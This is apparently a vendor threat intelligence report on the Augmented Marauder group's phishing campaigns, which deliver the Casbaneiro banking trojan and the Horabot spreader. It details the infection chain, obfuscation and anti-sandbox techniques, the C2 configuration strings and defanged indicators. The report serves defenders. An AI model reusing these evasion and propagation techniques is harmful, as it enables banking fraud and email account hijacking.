Unpacking Augmented Marauder’s Multi-Pronged Casbaneiro Campaigns

What Happened? 

BlueVoyant researchers have uncovered a broad, multi-pronged phishing campaign targeting Spanish-speaking users in organizations across Latin America and now Europe as well. While recent industry intelligence heavily documented attacks utilizing WhatsApp to deliver banking trojans under the umbrella of the Brazil-based eCrime group Augmented Marauder (a.k.a. Water Saci), the BlueVoyant Threat Fusion Cell (TFC) identified concurrent, ongoing attack activity showing this threat group employs a wider-ranging attack model focused on a bespoke delivery and propagation mechanism that includes WhatsApp, ClickFix techniques and email-centric phishing. This in-depth analysis shows how Augmented Marauder is simultaneously deploying Horabot to deliver the Casbaneiro (a.k.a. Metamorfo) banking trojan through a comprehensive phishing operation targeting Latin America that has also extended its attacks to users in Spain. 

The Initial Attack 

BlueVoyant researchers observed multiple users receiving phishing emails with the subject line "Citación judicial pendiente – actuación obligatoria comparecencia el No. 20260226-124145" (Pending judicial summons – mandatory appearance). The email contained a password-protected PDF attachment designed to mimic an official Spanish judicial notification, informing recipients they were legally required to appear as witnesses in court and directing them to click an embedded link to access their case file. The subject line and document content are deliberate scare tactics, invoking fear of legal consequences to pressure users into interacting with the email without scrutiny. 

The use of a password-protected attachment serves a dual purpose: it prevents email security gateways from scanning the PDF contents, and it creates a false sense of document legitimacy — implying the attachment contains sensitive legal material warranting protection.

Upon interacting with the embedded link, the victim's default browser is launched and directed to the attacker-controlled URL. BlueVoyant researchers observed that the landing page initiates an automatic file download without user interaction. Unlike previous iterations of this malware that relied on statically named archives, this variant utilizes a dynamic evasion upgrade. The downloaded ZIP archive's filename consists of a dynamically generated Version 4 UUID combined with a variable trailing string, both of which change with each download instance. This server-side generation of unique filename tokens is designed specifically to defeat hash-based detection and track individual victim click-through rates.

Contained within the ZIP archive was an HTA file, consistent with the same UUID-based naming convention observed in the archive filename. The HTA file contained a Java script tag referencing an external URL, indicating that if the victim interacted with the file, the Windows process mshta.exe would spawn and attempt to retrieve and execute code hosted at hxxps://ge.factu.it[.]com/GZSPEGIJ/YFSBNPQK. Consistent with previous Horabot campaigns documented by Fortinet and Kaspersky, the HTA file utilizes junk HTML padding to evade static signatures and leverages a moveTo() JavaScript function to reposition the execution window off-screen, hiding the activity from the user. Pivoting shows this campaign phase has been ongoing since September 2025 with a noticeable lull over December and January.

VBS Payloads

After executing the HTA file in a controlled environment, BlueVoyant researchers captured the resulting network traffic, which revealed a two-stage loading chain originating from the HTA file. The initial GET request to hxxps://104.21.19[.]50/GZSPEGIJ/YFSBNPQK returned a small JavaScript payload, served through Cloudflare, that dynamically injected a secondary VBScript element into the document pointing to hxxps://ge.factu.it[.]com/g1/ld1/. The second stage returned a gzip-compressed VBScript containing an obfuscated string decryption routine.

Embedded within the final VBS script was a custom string decryption function designed to conceal malicious content from static analysis tools. Rather than storing strings in plaintext, each encoded string is passed into a function at runtime and decrypted in memory. In one sample, BlueVoyant researchers observed the decryption process works by extracting the first character of the encoded string, which serves as a dynamic per-string key derived by subtracting 65 from its ASCII value and adding a hardcoded constant of 573. The remaining characters are then consumed in pairs, where each pair represents a base-25 encoded value using an A=0 alphabet. The decryption key is subtracted from each decoded pair value, and the result is converted back into a readable character.

Prior to execution, the VBS payload performs environment and anti-analysis checks identical to those detailed in Fortinet’s prior Horabot analysis, including checking for Avast directories and querying WMI for virtual machine artifacts. If triggered, the script terminates mshta.exe and exits.

However, BlueVoyant researchers noted an expansion of the hardcoded username blocklist. While previous campaigns only checked for the legacy sandbox user JOHN-PC, this newer variant actively searches for IT-Admin, WALKER, and TIM-XG178L01X6. This addition indicates the threat operators are actively gathering intelligence on modern sandboxing environments and refining their anti-analysis capabilities.

During this initial staging phase, BlueVoyant researchers identified artifacts suggesting the malware utilizes, or attempts to utilize, privilege impersonation techniques. Specifically, embedded URLs extracted from the attack chain contained the appended string Security=Impersonation. While this explicitly references WMI or COM objects configured with elevated impersonation levels (e.g., impersonationLevel=impersonate), its presence within a network request indicates it may be used as a C2 signaling flag to confirm elevated execution, a request for a specific permission-dependent payload, or potentially an artifact of script concatenation errors during runtime deobfuscation.

If the environment checks pass, the VBS script establishes a working directory at C:\Users\Public\LAPTOP-0QF0NEUP32 (a slight iteration on previously reported directory naming conventions) and downloads files from the attacker-controlled server at hxxps://ge.factu.it[.]com/g1/.

Among these downloaded files are Turo.exe (a renamed AutoIT interpreter) and Tekojac.exe (a renamed Aut2Exe compiler utility). To compile the payload and establish persistence, the malware employs the exact file attribute manipulation and Windows Startup folder shortcut (.LNK) techniques detailed in Fortinet's prior reporting. This includes purging pre-existing executables in the Startup and AppData directories, compiling standalone AutoIT outputs (newly named Obicaf.ai and Jiveve.ai), and dropping a timestamp file at C:\Users\Public\id.

AutoIT Script Analysis

Because the AutoIT scripts were downloaded in their uncompiled form prior to execution, they were easier to analyze and review. BlueVoyant researchers determined that each script acted as a loader, responsible for locating encrypted payload files with .ia or .at extensions (examples: Darutu.ia and Behurec.at), opening the files in binary mode and reading the contents directly into memory for further processing. These files serve as encrypted containers that store the next stage of the malware payload.

Analysis of these AutoIT scripts confirms the threat actor is still relying on the same cryptographic mechanisms observed and outlined by Kaspersky, Fortinet, and Cisco Talos previously. The scripts use the Windows CryptoAPI to decrypt the payloads via AES using the known hardcoded seed 99521487. The decrypted DLLs are then reflectively loaded into memory off-disk, and execution is passed to the widely documented export function B080723_N.

Using a debugger, BlueVoyant researchers placed a breakpoint on the function CryptDecrypt to obtain the decrypted payloads. Initial analysis indicated that the payloads represented two distinct but cooperative malware families: the Casbaneiro banking trojan (the primary payload) and Horabot (the delivery, evasion, and propagation botnet). Both payloads, staticdata.dll and at.dll, served a different purpose.

Casbaneiro Banking Trojan (staticdata.dll)

The larger file of the two, staticdata.dll, contained the core Casbaneiro malware, including its large strings table containing the names of popular Latin American and Spanish banks. Industry intelligence indicates the Brazil-based operators of Casbaneiro (a.k.a. Metamorfo) are the lone developers and users of this malware. Because Casbaneiro is an in-house tool and is not sold on underground forums as Malware-as-a-Service (MaaS), its presence allows BlueVoyant to assess with high confidence that this attack is attributable to a specific adversary, Augmented Marauder (a.k.a. Water Saci).

Further analysis of at least one staticdata.dll payload revealed underlying dependencies on OpenSSL to handle its cryptographic operations. Researchers extracted hardcoded strings embedded within the DLL referencing OpenSSL support pages directly concatenated with file paths, specifically hxxp://www[.]openssl[.]org/support/faq.html....................rbwb.rndC:HOMERANDFILEPRNG. While this string denotes the standard OpenSSL behavior of seeking a .rnd seed file to initialize the Pseudo-Random Number Generator (PRNG) for secure communications, it is likely a static compiler artifact. Its presence suggests the threat actors are statically linking older, legitimate OpenSSL or Delphi Indy communication libraries into their payloads, rather than actively writing custom file-system search routines.

After connecting to its hardcoded C2, the server responds with a series of encrypted strings, which staticdata.dll decrypts and reads. These strings include additional network URLs used for subsequent communications.

One of these URLs delivered a PowerShell command that invoked six separate PowerShell scripts, each containing an Invoke-WebRequest call to retrieve and execute further scripts hosted on remote servers. During analysis, BlueVoyant researchers observed that only one of the six remote servers was responsive. The PowerShell script hosted there was designed to replicate the initial phishing attack by leveraging the compromised host to distribute malicious emails to harvested contacts.

The Horabot Spreader (Propagation Script)

The final stage utilizes a highly obfuscated PowerShell script representing the core of the Horabot propagation engine. This script functions identically to the Horabot spreader documented by Cisco Talos and Fortinet: it leverages Outlook COM objects and the MAPI namespace to scrape the victim’s contacts, filters them against a downloaded blocklist, and writes them to %APPDATA%\Microsoft\.Outlook.

However, BlueVoyant researchers uncovered a highly sophisticated, previously undocumented dynamic lure generation capability within this script. Rather than distributing a static file or hardcoded link as seen in older Horabot campaigns, this script initiates an HTTP POST request to a remote PHP API (hxxps://tt.grupobedfs[.]com/.../gera_pdf.php), passing a randomly generated four-digit PIN.

The server dynamically forges a bespoke, password-protected PDF impersonating a Spanish judicial summons, which is returned to the infected host. The script then iterates over the filtered email list, utilizing the compromised user's own email account to send a tailored phishing email with the newly generated PDF attached.

By uniquely generating the payload for each propagation wave, the attackers drastically reduce the likelihood of outbound emails being fingerprinted and blocked by enterprise email security gateways (SEGs).

Horabot Webmail Hijacker (at.dll)

The secondary payload, at.dll, serves as a spam and account hijacking tool targeting Yahoo, Live, and Gmail accounts, aligning broadly with Cisco Talos's previous reporting on Horabot's Delphi-based spam modules. However, deep-dive reverse engineering by BlueVoyant uncovered a novel, modular remote configuration mechanism within this DLL.

Upon connecting to its C2 server (hxxps://cgf.facturastbs.shop/a/08/150822/au), at.dll retrieves a set of encrypted command strings that are decrypted at runtime. The decrypted strings include the following:

• AUTOON
• hxxps://msedge.sf.dl.delivery.mp.microsoft[.]com/filestreamingservice/files/eb361492-f9f3-48ca-ac3a-217ce4e06798/MicrosoftEdgeWebView2RuntimeInstallerX86.exe
• AUTOLISTAOFF
• ENVPDFON
• ENVGMTOGMOFF
• ENVHTTOHTOFF
• ENVIAPNGOFF
• TESTERON
• ENVIAFREEOFF
• ENVIASMTPON

These decrypted C2 strings appear to represent a remote configuration command set. They are compared against hardcoded reference values within the binary using an internal Delphi string comparison routine. If a match is found, a corresponding flag at a specific memory offset is flipped (set to 1), enabling that feature or behavior. This modular framework allows operators to adaptively configure the botnet to monitor and hijack webmail providers in real-time, without requiring any direct interaction with the compromised host or the deployment of new binaries.

Linkage to Broader LATAM Ecosystem

BlueVoyant assesses with high confidence the Horabot attack activity detailed in this report is operationally linked to the cybercriminal Augmented Marauder (a.k.a. Water Saci) threat group’s Maverick (a.k.a. Sorvepotel) malware campaigns recently documented by BlueVoyant’s TFC as well as Trend Micro. The strongest technical bridge uniting these seemingly distinct toolsets is their shared reliance on the Casbaneiro (a.k.a. Metamorfo) AutoIT execution framework. Because Casbaneiro is widely viewed as an exclusive, proprietary tool operated solely by its Brazil-based developers, its presence in this infection chain serves as a high-confidence attribution anchor.

This report stands alongside recent and foundational Horabot research from Kaspersky, Fortinet, and Cisco Talos, which highlights the use of legitimate AutoIT interpreters to decrypt and reflectively load Delphi banking payloads. In December 2025, Trend Micro observed Augmented Marauder variants employing this exact same AutoIT delivery mechanism, shortly after the group was observed deploying Maverick .NET payloads in October 2025--simultaneously identified by BlueVoyant. This highly specific execution chain, coupled with identical cryptographic seeds observed across the various malware families, strongly suggests shared developer resources or tooling for this adversary.

Furthermore, both sets of attack chains exhibit an identical, highly aggressive propagation philosophy that relies heavily on "Living off the Land" (LotL) and fileless execution techniques. Rather than simply stealing credentials and going dormant, both campaigns utilize deeply nested, script-heavy infection chains—transitioning from initial HTA, LNK, or VBS files into obfuscated PowerShell—to turn infected hosts into self-propagating botnets. Whereas this Horabot attack stream weaponizes PowerShell to manipulate Outlook COM objects and the MAPI namespace, the October-described Maverick (a.k.a. Sorvepotel) campaign utilized functionally similar PowerShell and Python scripts to automate WhatsApp Web via Chrome debugging and Selenium. In both models, the core objective is to hijack a victim's active communication session to scrape contacts and distribute malicious payloads, thereby bypassing traditional security perimeters by leveraging trusted sender identities. 

Both frameworks also share rigorous anti-analysis routines, utilizing WMI and system queries to evade known antivirus directories, specific debuggers, and sandbox environments. Once resident in memory, both the Horabot and Maverick attack chains utilize continuous window-title monitoring to trigger sophisticated, fake credential overlays when victims navigate to specific Latin American and Iberian banking or cryptocurrency institutions.

Finally, this linkage is reinforced by the parallel targeting and social engineering tactics. Both campaign branches rely on nearly identical initial access lures—such as fake invoices, tax documents, or the judicial summons observed in this draft—packed inside ZIP archives. Augmented Marauder's capacity for continuous evolution is further highlighted by their adoption of "ClickFix" tactics within the Horabot attack path. As recently documented by Kaspersky, the threat actors utilized fake CAPTCHA pages designed to trick victims into manually copying and executing malicious scripts via the Windows Run dialog. 

Taken together, the integration of ClickFix social engineering, alongside dynamic PDF generation and WhatsApp automation, demonstrates an agile adversary that is continually innovating and executing diverse attack paths to bypass modern security controls. Ultimately, BlueVoyant assesses this adversary is maintaining a bifurcated, multi-pronged attack infrastructure, dynamically deploying the WhatsApp-centric Maverick chain and concurrently utilizing both ClickFix and email-based Horabot attack paths.

Conclusion

The discovery of this phishing campaign exposes a highly strategic, multi-pronged attack model employed by the Augmented Marauder (a.k.a. Water Saci) threat group. It is now evident that while these Brazil-based operators heavily leverage script-based WhatsApp automation to compromise retail and consumer users in Latin America, they concurrently maintain and deploy an advanced, email-hijacking engine to penetrate enterprise perimeters there and Europe as well. Despite the divergence in initial access vectors, the underlying infection chain remains unified by the Casbaneiro AutoIT execution framework. 

What makes this adversary particularly dangerous is its rapid pace of innovation. Its continued use of dynamic payloads, server-side PDF lure generation and programmatic UUID-based ZIP archives allows the attackers to actively engineer methods to defeat hash-based detection and bypass modern Email Security Gateways (SEGs). Coupled with their recent integration of "ClickFix" social engineering tactics, documented WhatsApp automated attack chain and its extension to target Spanish-speaking users in Europe as well, Augmented Marauder has proven to be an agile threat group capable of continually evolving to overcome enterprise security controls.

MITRE ATT&CK Techniques

T1566 (Phishing)

T1566.001 (Spearphishing Attachment)

T1566.002 (Spearphishing Link)

T1534 (Internal Spearphishing)

T1657 (Financial Theft)

T1584 (Compromise Infrastructure)

T1204.001 (User Execution: Malicious Link) 

T1059.001 (PowerShell)

T1059.005 (Command and Scripting Interpreter: Visual Basic)

T1059.007 (Command and Scripting Interpreter: JavaScript)

T1027 (Obfuscated Files or Information)

T1140 (Deobfuscate/Decode Files)

T1055 (Process Injection)

T1497 (Virtualization/Sandbox Evasion)

T1218.005 (System Binary Proxy Exectuion: Mshta)

Indicators

hxxps://ge.factu.it[.]com/GZSPEGIJ/YFSBNPQK

hxxps://104.21.19[.]50/GZSPEGIJ/YFSBNPQK

hxxps://ge.factu.it[.]com/g1/ld1/

hxxps://ge.factu.it[.]com/g1/

hxxps://tt.grupobedfs[.]com/.../gera_pdf.php

hxxps://cgf.facturastbs[.]shop/a/08/150822/au

factu.it[.]com

grupobedfs[.]com

facturastbs[.]shop

239cb9232fe01c8b82eb627f66acc6848cb223dfea46d4923844c1fe20f1de49 - PDF Sample

3e4002c7f0909d3c743b3586098e248d413f485c6bb033cafdb322bd8b206ebb - PDF Sample

1af69a3283e28a8cc9a11819ecc2f2cff46dcabbfa78cefc71a02b881a064593 - HTA

69fc15919044fc6a94bb251afd90a0a07204b79df3bc62c49ba6b0febefbc33e - HTA

d1d08f7e44641d921fad22ed175b928c696befd14a55271eb203f8fcaff553d5 - ZIP

b56d00addd6c6a266de3c739dad22aa1de52624066544929754d47332257cba6 - ZIP

1693448804bf1c90ad7317af250bcd6ea021256e33e983b224aea81d4ecc2e20 - staticdata.dll

4e08a1525a62a387595a2e4942b56ec3f3b3259996115ea2e6ea3638ccb87705 - staticdata.dll